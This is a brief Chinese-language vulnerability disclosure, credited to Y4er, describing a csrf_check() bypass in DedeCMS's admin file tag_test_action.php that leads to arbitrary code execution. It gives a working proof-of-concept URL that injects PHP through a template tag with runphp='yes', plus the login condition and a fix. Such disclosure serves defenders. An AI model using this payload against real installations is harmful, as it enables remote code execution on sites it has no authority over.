该漏洞的触发点为/dede/tag_test_action.php
。起因是csrf_check()
的绕过,导致可执行任意代码。
POC:
http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}
利用条件:登录后台
解决方案:重新实现csrf_check()函数
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er